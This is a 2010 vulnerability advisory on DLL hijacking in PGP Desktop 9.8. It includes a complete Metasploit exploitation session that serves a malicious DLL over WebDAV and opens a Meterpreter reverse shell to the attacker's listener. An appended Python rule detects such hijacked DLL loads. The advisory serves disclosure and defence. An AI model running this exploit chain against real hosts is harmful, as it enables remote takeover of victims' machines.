Advisory: PGP Desktop 9.8 - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking) [Update: 08.09.2010]
- in a nutshell:
---------------------------------------------
PGP Desktop 9.8 - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking)
Date: 29.08.2010
---------------------------------------------
- PGP Desktop Description
PGP® Desktop Professional provides a comprehensive set of encryption applications to protect sensitive data in email and instant messages and on disk or removable media. PGP Desktop Professional secures confidential data, protecting sensitive business information and helping to meet partner and regulatory mandates for information security and privacy.
- Insecure Library Loading allows Remote Code Execution
This vulnerability was discovered using the Metasploit Framework with the following option: "set EXTENSIONS pgp"
For more vulnerability details please check the links in the reference section.
- Affected Versions
PGP Desktop 9.8 - 9.8.3 Build 4028 - other releases may also be affected.
- Solution
It is not known if there are fixed releases available.
- Credits
The vulnerability was discovered by m1k3 - m1k3#at#m1k3#dot#at
- Timeline
29.08.2010 - vulnerability discovered
29.08.2010 - public disclosure
- Reference
- http://www.pgp.com/products/index.html
- http://www.microsoft.com/technet/security/advisory/2269637.mspx
- http://www.exploit-db.com/dll-hijacking-vulnerable-applications/
- http://blog.metasploit.com/2010/08/better-faster-stronger.html
- http://www.metasploit.com/modules/exploit/windows/browser/webdav_dll_hij...
- http://www.securityfocus.com/bid/42856/info
- http://secunia.com/advisories/41135
- http://www.s3cur1ty.de/advisories
- Exploiting example:
msf exploit(webdav_dll_hijacker) > set EXTENSIONS pgp
EXTENSIONS => pgp
msf exploit(webdav_dll_hijacker) > show options
Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BASENAME    policy           yes       The base name for the listed files.
   EXTENSIONS  pgp              yes       The list of extensions to generate
   SHARENAME   documents        yes       The name of the top-level share.
   SRVHOST     10.8.28.9        yes       The local host to listen on.
   SRVPORT     80               yes       The daemon port to listen on (do not change)
   URIPATH     /                yes       The URI to use (do not change).

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     10.8.28.9        yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 10.8.28.9:4444
[*]
[*] Exploit links are now available at \\10.8.28.9\documents\
[*]
[*] Using URL: http://10.8.28.9:80/
[*] Server started.
<snip>
[*] 10.8.28.55:49183 PROPFIND /documents/
[*] 10.8.28.55:49183 PROPFIND => 207 Directory (/documents/)
[*] 10.8.28.55:49183 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49183 PROPFIND /documents/policy.pgp
[*] 10.8.28.55:49183 PROPFIND => 207 File (/documents/policy.pgp)
[*] 10.8.28.55:49183 PROPFIND /documents/credssp.dll
[*] 10.8.28.55:49183 PROPFIND => 207 File (/documents/credssp.dll)
[*] 10.8.28.55:49183 PROPFIND /
[*] 10.8.28.55:49183 PROPFIND => 207 Directory (/)
[*] 10.8.28.55:49183 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49183 GET => DLL Payload
[*] 10.8.28.55:49183 PROPFIND /DOCUMENTS
[*] 10.8.28.55:49183 PROPFIND => 301 (/DOCUMENTS)
[*] 10.8.28.55:49183 PROPFIND /DOCUMENTS/
[*] 10.8.28.55:49183 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 10.8.28.55:49183 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49183 PROPFIND /documents/rundll32.exe
[*] 10.8.28.55:49183 PROPFIND => 404 (/documents/rundll32.exe)
[*] Sending stage (748544 bytes) to 10.8.28.55
[*] Meterpreter session 1 opened (10.8.28.9:4444 -> 10.8.28.55:49189) at Sun Aug 29 20:40:27 +0200 2010
msf exploit(webdav_dll_hijacker) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: m1k3-Vista\m1k3
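The session above shows the defining symptom of this class of bug: after the client opens policy.pgp from the share, the application asks the same share for credssp.dll, a library that Windows normally serves from System32. The following script is an added detection example written for this advisory; it is not part of the original advisory or of any PGP or Metasploit code. It runs a simple rule over constructed Sysmon-style image-load records and flags loads of a known system DLL from a remote share or from any directory outside the system directories. The process name pgpdesk.exe, the record format and the log lines themselves are assumptions made for the example.

```python
"""Flag DLL loads matching the hijacking pattern described in the advisory:
a library the OS normally serves from System32 (credssp.dll in the exploit
log) being loaded from a remote share or a document's directory instead."""
import ntpath
from typing import Iterable, List, Optional

# DLL name taken from the advisory's exploit log; a real deployment would
# extend this set with other libraries that belong in System32.
SYSTEM_DLLS = {"credssp.dll"}

# Directories from which Windows legitimately serves system DLLs.
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

# Constructed Sysmon-style "Image loaded" records as key=value pairs joined
# by '|'. These are sample input made up for this example, not real logs;
# pgpdesk.exe is a hypothetical placeholder for the document viewer.
SAMPLE_EVENTS = [
    r"Image=C:\Program Files\PGP\pgpdesk.exe|ImageLoaded=C:\Windows\System32\credssp.dll",
    r"Image=C:\Program Files\PGP\pgpdesk.exe|ImageLoaded=\\10.8.28.9\documents\credssp.dll",
    r"Image=C:\Windows\explorer.exe|ImageLoaded=C:\Users\alice\Downloads\CREDSSP.DLL",
    r"Image=C:\Windows\System32\notepad.exe|ImageLoaded=C:\Windows\System32\kernel32.dll",
    r"Image=C:\Program Files\PGP\pgpdesk.exe|ImageLoaded=C:\Program Files\PGP\pgpui.dll",
]


def parse_event(line: str) -> dict:
    """Split 'k=v|k=v' into a dict with lower-cased field names."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip().lower()] = value.strip()
    return fields


def is_unc_path(path: str) -> bool:
    """True for \\server\share\... paths; WebDAV shares appear this way too."""
    return path.startswith("\\\\")


def classify_load(loaded: str) -> Optional[str]:
    """Return a reason string if the load looks like a hijack, else None.

    Windows paths are case-insensitive (the exploit log shows both
    /documents/ and /DOCUMENTS/), so everything is compared lower-cased.
    """
    norm = loaded.lower()
    name = ntpath.basename(norm)
    directory = ntpath.dirname(norm)
    if is_unc_path(norm):
        return "dll loaded from remote share"
    if name in SYSTEM_DLLS and not directory.startswith(TRUSTED_DIRS):
        return "system dll loaded outside system directories"
    return None


def find_suspicious_loads(lines: Iterable[str]) -> List[dict]:
    """Apply classify_load to every record and collect the hits."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        loaded = ev.get("imageloaded", "")
        reason = classify_load(loaded)
        if reason:
            findings.append({"process": ev.get("image", ""),
                             "dll": loaded, "reason": reason})
    return findings


if __name__ == "__main__":
    for hit in find_suspicious_loads(SAMPLE_EVENTS):
        print(f"{hit['reason']}: {hit['process']} -> {hit['dll']}")
```

Run against the constructed records, the rule flags the load from \\10.8.28.9\documents\ and the copy of credssp.dll in a user's Downloads folder, while the genuine System32 copy and the application's own pgpui.dll pass. The Microsoft advisory linked in the reference section describes the system-wide mitigation for the loader behaviour itself; a rule like this one is the complementary detection for hosts where that mitigation is not yet deployed.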